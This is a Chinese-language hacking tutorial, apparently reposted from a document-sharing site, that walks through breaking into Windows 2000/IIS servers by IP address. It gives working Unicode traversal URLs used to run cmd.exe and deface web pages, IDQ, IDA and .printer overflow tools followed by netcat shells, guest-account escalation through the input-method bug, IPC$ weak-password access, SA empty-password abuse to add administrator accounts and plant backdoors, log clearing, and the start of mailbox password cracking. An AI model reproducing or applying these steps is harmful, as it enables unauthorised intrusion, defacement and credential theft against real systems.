知道对方IP如何攻击入侵.docx
- 文档编号:8338924
- 上传时间:2023-01-30
- 格式:DOCX
- 页数:13
- 大小:22.84KB
知道对方IP如何攻击入侵.docx
《知道对方IP如何攻击入侵.docx》由会员分享,可在线阅读,更多相关《知道对方IP如何攻击入侵.docx(13页珍藏版)》请在冰豆网上搜索。
知道对方IP如何攻击入侵
如何IP攻击
(1)UNICODE漏洞入侵
“Uicode漏洞”是微软IIS的一个重大漏洞。
2001年最热门漏洞之一。
第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。
在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.168.0.1,在to后面的框里填入192.168.0.255意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。
接着在中间有一个添加的横框,是要填入内容的如:
/scripts/..%c0%af../winnt/system32/cmd.exe
这句话的意思是扫描有%c0%af漏洞的机器,对象一般是英文的WIN2000机。
我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。
再按“扫描”。
就看到RANGSCAN开始扫了。
这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,很快在扫描结果框里就会显示扫到的漏洞主机
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主机有%c0%af漏洞,
目标有了,我们马上打开浏览器。
在网址栏里输入:
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?
/c+dir+c:
\回车
意思是查看机器里C盘的根目录。
一般情况下,我们都可以在浏览器里看到类似如:
Directoryofc:
\
2002-03-1303:
47p289default.asp
2002-02-1103:
47p289default.htm
2002-03-0904:
35p
2002-02-1103:
47p289index.asp
2002-02-1103:
47p289index.htm
2002-05-0805:
19a
2002-01-1910:
37p
2002-03-0904:
22p
2002-01-2306:
21p
4File(s)1,156bytes
5Dir(s)2,461,421,568bytesfree
------------------------------
的目录列表。
也会碰到看不到文件的空目录。
好,我们成功看到了机器里的C盘了。
我们在浏览器里输入:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?
/c+set回车
CGIError
ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:
ALLUSERSPROFILE=C:
\DocumentsandSettings\AllUsers
CommonProgramFiles=C:
\ProgramFiles\CommonFiles
COMPUTERNAME=ON
ComSpec=C:
\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE6.0b;Windows98;Win9x4.90)
HTTP_ACCEPT_ENCODING=gzip,deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:
\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:
\WINNT\system32;C:
\WINNT;C:
\WINNT\System32\Wbem;C:
\MSSQL7\BINN
PATH_TRANSLATED=c:
\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86Fa
-----------------
哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:
\inetpub\wwwroot
意思是他的主页存放在c:
\inetpub\wwwroot的目录里,知道就好办了。
我们用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?
/c+dir+c:
\inetpub\wwwroot回车
我们就可以看到c:
\inetpub\wwwroot目录里的文件了,一般都有default.asp,default.htm,index.htm,index.asp,等等。
我们以目录里有index.asp做例子。
我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。
我们用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?
%20-r%20-h%20c:
\inetpub\wwwroot\index.asp回车
当看到下面的英文
CGIError
ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete
setofHTTPheaders.Theheadersitdidreturnare:
恭喜你,你可以改他的网页了。
----------------------------------------
但如果你看到下面的英文就不成功,只好换其他机器了。
CGIError
ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:
Accessdenied-C:
\inetpub\wwwroot\index.asp
-----------------------------
继续。
现在用ECHO改网页的内容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?
/c+echo+网站有漏洞+>c:
\inetpub\wwwroot\index.asp回车
当看到
CGIError
ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete
setofHTTPheaders.Theheadersitdidreturnare:
的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。
只要把命令中的中文换成你自己的中文就行了。
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?
/c+dir+c:
\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WINNT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代码:
/scripts/..%255c../winnt/system32/cmd.exe?
/c+dir+c:
\
(2)Windows2000输入法漏洞
先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。
选择“帮助”——“输入法指南”——“选项”。
(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。
)按右键,选择“跳转到URL”,输入:
c:
\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性”—“目标”—c:
\winnt\system32\net.exe后面空一格,填入“userguest/active:
yes”。
点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。
(此时你不会看到运行状态,但guest用户已被激活。
)然后重复操作上面的,在“属性”——“目标”——c:
\winnt\system32\net.exe后面空一格,填入localgroupadministratorsguest/add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。
)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。
现在,我们可以像操作本地主机一样,控制对方系统。
(3)idq溢出漏洞
要用到3个程序,一个SnakeIISIDQ溢出程序GUI版本,一个扫描器,还有NC。
首先扫描一台有IDQ漏洞的机器,然后设置SnakeIISIDQ溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5EnglishWin2kSp0吧,点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了,然后我们用NC来连接。
进入MS-DOS。
进入“nc”的目录。
然后:
nc--vIP813
c:
\>nc-vvIP813
IP:
inversehostlookupfailed:
h_errno11004:
NO_DATA
(UNKNOWN)[IP]813(?
):
connectionrefused
sent0,rcvd0:
NOTSOCK
c:
\>
看来没成功.别灰心,在来一次,换用IIS5EnglishWin2kSp1试试。
c:
\>nc-vvIP813
IP:
inversehostlookupfailed:
h_errno11004:
NO_DATA
(UNKNOWN)[IP]813(?
)open
MicrosoftWindows2000[Version5.00.2195]
(C)Copyright1985-2000MicrosoftCorp.
C:
\WINNT\system32>
哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。
(4)IDA溢出漏洞
所用程序:
idahack
进入MS-DOS方式(假设idq.exe在c:
\下)
c:
\idahack.exe
运行参数:
c:
\idahack
chinesewin2k:
1
chinesewin2ksp1:
2
chinesewin2ksp2:
3
englishwin2k:
4
englishwin2ksp1:
5
englishwin2ksp2:
6
japanesewin2k:
7
japanesewin2ksp1:
8
japanesewin2ksp2:
9
koreawin2k:
10
koreawin2ksp1:
11
koreawin2ksp2:
12
chinesentsp5:
13
chinesentsp6:
14
c:
\idahack127.0.0.180180
connecting...
sending...
Nowyoucantelnetto80port
好luck
好,现在你可以telnet它的80端口了,我们用NC来连接。
C:
\nc127.0.0.180
MicrosoftWindows2000[Version5.00.2195]
(C)版权所有1985-1998MicrosoftCorp
C:
\WINNT\system32>
OK,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。
(5).printer漏洞
这个漏洞,我们用两个程序来入侵。
iis5hack和nc。
C:
\>iis5hack
iis5remote.printeroverflow.writenbysunx
http:
//www.sunx.org
fortestonly,dontusedtohack,:
p
usage:
D:
\IIS5HACK.EXE
用法:
D:
\IIS5HACK<溢出的主机><主机的端口><主机的类型><溢出的端口>
chineseedition:
0
chineseedition,sp1:
1
englishedition:
2
englishedition,sp1:
3
japaneseedition:
4
japaneseedition,sp1:
5
koreaedition:
6
koreaedition,sp1:
7
mexicoedition:
8
mexicoedition,sp1:
9
c:
\>iis5hack127.0.0.19801119
iis5remote.printeroverflow.writenbysunx
http:
//www.sunx.org
fortestonly,dontusedtohack,:
p
Listn:
80
connecting...
sending...
Nowyoucantelnetto3739port
好luck
溢出成功!
c:
\>nc127.0.0.19119
http:
//www.sunx.org
MicrosoftWindows2000[Version5.00.2195]
(C)版权所有1985-2000MicrosoftCorp.
C:
\WINNT\system32>
OK,我们又成功取得system权限!
玩吧。
(6)139端口入侵
我们先确定一台存在139端口漏洞的主机。
用扫描工具扫描!
比如SUPERSCAN这个端口扫描工具。
假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat-aIP这个命令得到用户的情况!
现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET命令,下面就是这两个命令的使用方法
NETVIEW?
作用:
显示域列表、计算机列表或指定计算机的共享资源列表。
?
命令格式:
netview[\\computername|/domain[:
domainname]]?
参数介绍:
?
<1>键入不带参数的netview显示当前域的计算机列表。
?
<2>\\computername指定要查看其共享资源的计算机。
?
<3>/domain[:
domainname]指定要查看其可用计算机的域?
NETUSE?
作用:
连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。
?
命令格式:
netuse[devicename|*][\\computername\sharename[\volume]]?
[password|*]][/user:
[domainname\]username][[/delete]|?
[/persistent:
{yes|no}]]?
参数介绍:
?
键入不带参数的netuse列出网络连接。
?
devicename指定要连接到的资源名称或要断开的设备名称。
?
\\computername\sharename服务器及共享资源的名称。
?
password访问共享资源的密码。
?
*提示键入密码。
/user指定进行连接的另外一个用户。
?
domainname指定另一个域。
?
username指定登录的用户名。
?
/home将用户连接到其宿主目录?
/delete取消指定网络连接。
?
/persistent控制永久网络连接的使用。
?
C:
\netuse\\IP
C:
\netview\\IP
我们已经看到对方共享了他的C,D,E三个盘
我们要做的是使用NBTSTAT命令载入NBT快取.
c:
\>nbtstat–R载入NBT快取
c:
\>nbtstat–c看有无载入NBT快取
现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!
双击就可以进入,其使用的方法和网上领居的一样。
(7)IPC入侵
所有程序:
流光
开始:
在主界面选择探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。
输入我们要破解的IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。
因为我们只想获得IPC弱口令,这样可以加快扫描的速度:
)填入IP,选择扫描NT/98主机。
在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”,,扫描出结果以后,“IPC$主机”,选中后按“CTRL+F9”就开始探测IPC用户列表。
会出现“IPC自动探测”
的窗体,把那两个选项都选了,然后点“选项”为了加快弱口令扫描速度,这里的两个选项我们可以全部取消记住。
然后点“确定”出来后点“是”就开始探测了。
一会儿,结果出来了。
比如我们探测出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命令吧,输入:
netusefile:
//对方ip/ipc$"密码"/user:
"用户名"||建立远程连接
copyicmd.exefile:
//对方ip/admin$||admin$是对方的winnt目录
nettimefile:
//对方IP/||看看对方的本地时间
atfile:
//对方ip/启动程序的时间启动程序名启动程序的参数||用at命令来定时启动程序
telnet对方ip端口
我们也可以改网页:
netuse\\ip\ipc$"admin"/uesr:
"admin"回车。
出现“命令成功完成”。
然后输入“dir\\ip\c$\*.*”
看到C:
下所有内容。
现在我们来改主页。
一般主页放在c:
\inetpub\wwwroot里面
输入“dir\\ip\c$\inetpub\wwwroot\*.*”。
就可以看到index.htm或index.asp或default.htm或default.asp.这些就是主页了,假如你黑页在C:
下,就输入"copy主页文件\\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了,简单吧?
日志清除,断开连接:
我们copycl.exe,clear.exe上去,再执行,就可以清除日志,比如clearall:
清除所有的日志。
然后在断开连接:
netusefile:
//ip/ipc$/delete
(8)超管SA空密码漏洞
使用的工具:
流光IV
启动流光,按Ctrl+R。
出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。
点击“确定”,进行扫描,假设我们取得主机:
127.0.0.1,然后点击“工具”——SQL远程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。
netuserheiyingheiying1/add填加一个heiying的帐号和密码heiying1
netlocalgroupadministratorsheiying/add将我们创建的heiying帐号填加到管理组。
下面我们来做跳板:
打开cmd.exe,输入netuse\\127.0.0.1\ipc$"heiying1"/user:
"heiying"命令
显示命令成功完成。
上传srv.exe:
copysrv.exe\\127.0.0.1\admin$\system32
上传ntlm.exe:
copyntlm.exe\\127.0.0.1\admin$\system32
启动服务:
首先用nettime\\127.0.0.1
看看对方主机的时间,(假如回显\\127.0.0.1的本地时间是上午12.00),然后我们用at\\2127.0.0.112.01srv.exe命令来启动srv.exe。
等一分钟后就可以telnet了。
一分钟后在本机命令提示符中输入:
telnetX.X.X.X99
然后我们要启动NTLM.exe:
在telnet状态下直接输入ntlm回车。
显示:
windows2000telnetdump,byassassin,allrightsreserved.done!
然后从新启动对方主机的telnet服务:
netstoptelnet(先关闭telnet服务)再输入netstarttelnet(启动telnet服务)然后我们退出telnet,然后在命令行下输入telnet127.0.0.1,依照提示,接着输入用户名:
heiying,密码:
heiying1,回车。
这样,我们的跳板就做好了,简单吧?
(上面上传的srv和ntlm等东东还有一个简便方法,全都可以直接用流光工具菜单里的种植者上传,60秒后自动运行,不用敲命令!
呵呵~~~~方便吧!
)
(9)如何用流光破解信箱密码
这次的目标是21CN,运行流光IV,选择POP3主机----右键----编辑----添加,填上:
,其他的就用默认吧!
不用更改,确定
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 知道 对方 IP 如何 攻击 入侵